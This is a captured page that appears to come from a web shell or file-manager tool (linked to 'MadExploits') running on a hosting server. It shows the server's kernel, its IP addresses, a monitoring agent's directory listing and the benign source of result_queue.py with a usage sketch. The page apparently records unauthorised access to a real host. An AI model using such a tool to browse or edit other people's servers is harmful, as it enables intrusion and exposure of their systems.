Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
Server IP: 148.66.134.25 | Client IP: 18.117.103.185
66 Domains
8.0.30
amvm
www.github.com/MadExploits
Directory listing: /usr/lib/fm-agent/library/
Name                    Size      Permission
__pycache__             [ DIR ]   drwxr-xr-x
__init__.py             0 B       -rw-r--r--
agent.py                96.8 KB   -rw-r--r--
agent_exceptions.py     110 B     -rw-r--r--
agent_util.py           8.58 KB   -rw-r--r--
aggregator.py           14.89 KB  -rw-r--r--
anomaly.py              2.19 KB   -rw-r--r--
blacklister.py          809 B     -rw-r--r--
container_discovery.py  3.3 KB    -rw-r--r--
display.py              2.06 KB   -rw-r--r--
forticlient_helper.py   2.59 KB   -rw-r--r--
inspector.py            15.7 KB   -rw-r--r--
iperf3.py               2.12 KB   -rw-r--r--
log_matcher.py          4.27 KB   -rw-r--r--
maintenance.py          3.61 KB   -rw-r--r--
pickle_database.py      1.28 KB   -rw-r--r--
plugin_driver.py        4.78 KB   -rw-r--r--
plugin_manager.py       11.04 KB  -rw-r--r--
process_manager.py      851 B     -rw-r--r--
progress_printer.py     837 B     -rw-r--r--
result_queue.py         1.99 KB   -rw-r--r--
schedule.py             3.19 KB   -rw-r--r--
threshold.py            1.5 KB    -rw-r--r--
Code Editor: result_queue.py
class ResultQueue(object):
    """
    If the aggregator can't be reached for some reason, we want to still keep
    calculating results and store them locally until we can reach the agg again.
    """

    # Variables for ResultQueue
    #QUEUE_MAX_RESULTS = 150000  # We put results in a queue if aggregator can't be reached.
    #QUEUE_BATCH_SIZE = 10000    # How many queue results we send back to the aggregator at once

    def __init__(self, queue_max_results=None, queue_batch_size=None):
        self.data = []
        self.queue_max_results = queue_max_results
        if self.queue_max_results is None:
            self.queue_max_results = 150000
        self.queue_batch_size = queue_batch_size
        if self.queue_batch_size is None:
            self.queue_batch_size = 10000

    def pop(self):
        # remove the oldest results first
        self.data.pop(0)

    # Pop only the most recent result
    def pop_latest(self):
        self.data.pop()

    def pop_results(self, chunk=None):
        if chunk is None:
            chunk = self.queue_batch_size
        # Pop and return 'chunk' of the newest items
        if len(self.data) <= chunk:
            result = self.data
            self.data = []
        else:
            x = len(self.data) - chunk
            result = self.data[x:]
            self.data = self.data[:x]
        return result

    def push(self, result):
        if len(self.data) == self.queue_max_results:
            self.pop()
        self.data.append(result)

    def update(self, results):
        if len(results) + len(self.data) <= self.queue_max_results:
            self.data.extend(results)
        else:
            # Make room so we stay under QUEUE_MAX_RESULTS
            free_space = self.queue_max_results - len(self.data)
            removal = len(results) - free_space
            self.data = self.data[removal:]
            self.data.extend(results)

    def isEmpty(self):
        return len(self.data) == 0

    def queueLength(self):
        return len(self.data)
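For context, a minimal usage sketch of ResultQueue, assuming results are plain dicts produced by a monitoring loop; send_to_aggregator is a hypothetical stand-in for the real transport back to the aggregator, which is not part of this file.

def send_to_aggregator(batch):
    # Hypothetical stand-in for the real aggregator transport (assumption).
    print("flushing %d queued results" % len(batch))

queue = ResultQueue(queue_max_results=1000, queue_batch_size=100)

# Buffer results locally while the aggregator is unreachable; once the cap
# of queue_max_results is reached, push() drops the oldest entry first.
for i in range(250):
    queue.push({"metric": "cpu", "value": i})

# When the aggregator is reachable again, drain the newest results in
# batches of up to queue_batch_size items per call.
while not queue.isEmpty():
    send_to_aggregator(queue.pop_results())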